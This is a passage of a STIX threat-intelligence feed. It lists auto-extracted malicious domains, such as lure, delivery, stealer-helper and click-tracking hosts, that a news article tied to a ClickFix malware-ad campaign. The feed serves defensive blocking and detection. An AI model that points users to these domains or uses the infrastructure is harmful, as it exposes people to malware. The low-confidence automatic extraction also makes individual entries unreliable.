News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--811a2c5a-85fa-4d91-8688-146de3d0a3db","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: houstongaragedoorinstallers.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: .]com September macOS telemetry and delivery domains Domain houstongaragedoorinstallers[.]com; pressureulcerlawyer[.]com; lalandscapelighting[.]com; ai","pattern":"[domain-name:value = 'houstongaragedoorinstallers.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--24455b33-34ac-4a00-9ba1-9eda25fba578","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: lakhov.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: me[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com AMOS helper and","pattern":"[domain-name:value = 'lakhov.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c27ae334-1026-4d8f-a4ee-7bd0a5d90cf8","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: lalandscapelighting.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ustongaragedoorinstallers[.]com; pressureulcerlawyer[.]com; lalandscapelighting[.]com; aidevmaster[.]com; pinescope11[.]com; dogtrainersgeorgia","pattern":"[domain-name:value = 'lalandscapelighting.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4c5b3b22-feab-46fa-843e-5a68ff0cc326","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: leaf68.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: trefoils[.]com Click-tracking domains Domain press29[.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; p","pattern":"[domain-name:value = 'leaf68.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2f4a91ea-15b4-48c8-8ab4-5221be915872","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: loop-lumen.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: [.]com; aforvm[.]com AMOS helper and tasking domains Domain loop-lumen[.]com; umapla[.]com; glrack[.]com Fake wallet delivery domains","pattern":"[domain-name:value = 'loop-lumen.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3afaa5c1-51b3-40ea-993b-0955fcf87760","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: macdeveloperhub.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: s-route domains Domain crisp-paths[.]com; cli-guides[.]com; macdeveloperhub[.]com; macfixguide[.]com; claud-tips[.]com; codex-paths[.]com;","pattern":"[domain-name:value = 'macdeveloperhub.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3ea207f4-be08-4eb5-bc58-a3698446c14f","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: macfixguide.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: crisp-paths[.]com; cli-guides[.]com; macdeveloperhub[.]com; macfixguide[.]com; claud-tips[.]com; codex-paths[.]com; cmux-lab[.]com; rec","pattern":"[domain-name:value = 'macfixguide.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ea817a42-1d47-479f-bec8-3ea623c9ae85","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: macstoragetips.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: va-tools[.]top; novastacktips[.]com; remotion-skills[.]com; macstoragetips[.]com Provisioning-neighborhood domains Domain chatgpt-safepage","pattern":"[domain-name:value = 'macstoragetips.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--371821a5-fab9-4e39-b208-2faca776a984","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: marbellaresales.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: heater[.]com; restoremental[.]com; glowmedaesthetics[.]com; marbellaresales[.]com; gatemaden[.]space; beaocnagent[.]com; hbubagent[.]com Ma","pattern":"[domain-name:value = 'marbellaresales.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7a2a8801-1292-4fd5-9895-0bc324e9aa2a","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: microsoftupdater.info","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: page[.]com; thepullmanfolkestone[.]com; gigappyworld[.]com; microsoftupdater[.]info; gogolfonline[.]com; heroestales[.]com; wantsellonline[.]","pattern":"[domain-name:value = 'microsoftupdater.info']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8bf28ba0-5de6-46d6-8161-526c994ce06c","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: mpasvw.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: -slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com AMOS helper and tasking domai","pattern":"[domain-name:value = 'mpasvw.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--97e3e9dc-235a-4876-a395-67202236d238","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: muse-code-ide.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; codex-paths[.]com; cmux-lab[.]com; rectangleap[.]com; muse-code-ide[.]com; hbomaxx[.]app; codex-craft[.]com; code-desktop[.]com; cl","pattern":"[domain-name:value = 'muse-code-ide.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--868e7df9-952b-4378-bc63-03070a40261a","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: node-slate.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ins Domain arkypc[.]com; harbor-29[.]com; fern-plume[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]c","pattern":"[domain-name:value = 'node-slate.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d0f24c05-87e3-4e48-878f-368ada6f6af7","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: nova-desk.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: -linked lure domains Domain applediag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-to","pattern":"[domain-name:value = 'nova-desk.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d089ece6-e67e-4e33-acea-9a9520655961","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: nova-fix.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ins Domain applediag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novas","pattern":"[domain-name:value = 'nova-fix.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--88295112-0175-4816-91ce-1c27bbcba2f8","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: nova-hub.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: diag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com;","pattern":"[domain-name:value = 'nova-hub.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7a062238-9e84-4a69-a086-1d34513cd742","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: nova-labs.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com; remotion-skills[.","pattern":"[domain-name:value = 'nova-labs.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5f49f42d-e881-4043-a790-a54b71303048","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: novastacktips.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: x[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com; remotion-skills[.]com; macstoragetips[.]com Provisioning","pattern":"[domain-name:value = 'novastacktips.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6504deca-fc76-4f0f-92b8-bbe364655aa7","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: nova-tools.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: esk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com; remotion-skills[.]com; macstorageti","pattern":"[domain-name:value = 'nova-tools.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0c0b1615-2dd8-485e-9bcf-ab5b2018b6b7","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: oakenfjrod.ru","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: Fake wallet delivery domains Domain desktop-version[.]com; oakenfjrod[.]ru Windows staging domains Domain sic180[.]com; habar55[.]na","pattern":"[domain-name:value = 'oakenfjrod.ru']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--588a5b23-f98c-4b8a-9322-046a30dfe8cd","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: opendisplay.us","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: -desktop[.]com; claude-tools[.]com; clean-disk-tools[.]com; opendisplay[.]us Provisioning-linked lure domains Domain applediag[.]com;","pattern":"[domain-name:value = 'opendisplay.us']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e4498fbe-95ab-4d6b-97ef-9804b2290289","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: ouilov.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com AMOS helper and tasking domains Domain loop","pattern":"[domain-name:value = 'ouilov.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c3744779-ac41-4cbc-9918-cb696eaef841","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: papartybus.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ogolfonline[.]com; heroestales[.]com; wantsellonline[.]com; papartybus[.]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; sp","pattern":"[domain-name:value = 'papartybus.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cf6cf004-0f38-4665-bd91-b84ee1f64dfe","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: perchframe15.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: mains Domain press29[.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekmesh15[.]com macOS lo","pattern":"[domain-name:value = 'perchframe15.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f4624d5d-fba4-4113-913b-a0c8ee67e4ca","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: pine63.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: com; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekmesh15[.]com macOS loader-delivery domains Domain we","pattern":"[domain-name:value = 'pine63.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8371c719-a2f0-4fa3-adbc-932e071e966d","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: pinescope11.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: lawyer[.]com; lalandscapelighting[.]com; aidevmaster[.]com; pinescope11[.]com; dogtrainersgeorgia[.]com; denverplumbingandwaterheater[.","pattern":"[domain-name:value = 'pinescope11.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c8abad6d-99a1-478e-8761-0c055a6cee7e","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: press29.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: m; camaligsalvatrefoils[.]com Click-tracking domains Domain press29[.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canv","pattern":"[domain-name:value = 'press29.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5b3f3527-b9ce-4a32-bc04-f72521a0ca4a","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: pressureulcerlawyer.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: delivery domains Domain houstongaragedoorinstallers[.]com; pressureulcerlawyer[.]com; lalandscapelighting[.]com; aidevmaster[.]com; pinescope1","pattern":"[domain-name:value = 'pressureulcerlawyer.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--04f82cbe-1035-482d-9260-976e5723889f","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: rectangleap.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: .]com; claud-tips[.]com; codex-paths[.]com; cmux-lab[.]com; rectangleap[.]com; muse-code-ide[.]com; hbomaxx[.]app; codex-craft[.]com; c","pattern":"[domain-name:value = 'rectangleap.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d5b5f600-d25c-43ca-b686-e1a5671813a9","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: remotion-skills.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: op; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com; remotion-skills[.]com; macstoragetips[.]com Provisioning-neighborhood domains D","pattern":"[domain-name:value = 'remotion-skills.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--da450e87-9074-46d9-8745-235851ac01df","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: restoremental.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: gtrainersgeorgia[.]com; denverplumbingandwaterheater[.]com; restoremental[.]com; glowmedaesthetics[.]com; marbellaresales[.]com; gatemade","pattern":"[domain-name:value = 'restoremental.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ee90c688-a201-49bc-8836-a753ada7bf69","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: rudder-moss.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ivery domains Domain weaveridge7[.]com; ember-bridge[.]com; rudder-moss[.]com; wuess[.]com September macOS telemetry and delivery domai","pattern":"[domain-name:value = 'rudder-moss.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0ded32da-b746-4e2b-a210-4147ba8c7571","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: sgaaagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: com; papartybus[.]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; sprieagent[.]com; cosimcagent[.]com; cehamilton[.]com; b","pattern":"[domain-name:value = 'sgaaagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--798609a4-5eb2-4c3c-8da3-fe52d4df1a1c","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: sic180.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: rsion[.]com; oakenfjrod[.]ru Windows staging domains Domain sic180[.]com; habar55[.]namebright[.]bike SIC Windows-route domains Do","pattern":"[domain-name:value = 'sic180.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--34ef5b80-c6b9-48f1-9e81-bbe0508c32b9","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: sprieagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; sprieagent[.]com; cosimcagent[.]com; cehamilton[.]com; broadwalkindia[.]co","pattern":"[domain-name:value = 'sprieagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5565a6dc-707c-4424-80c2-706279488c99","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: storageprofiler.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: le activity IP address 172.236.51[.]169 Origin observed for storageprofiler[.]com gated lure IP address 138.124.93[.]32 AMOS helper /contac","pattern":"[domain-name:value = 'storageprofiler.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fd1aa4e9-4ba4-4b58-b933-c752ba2d64a0","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: thepullmanfolkestone.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix 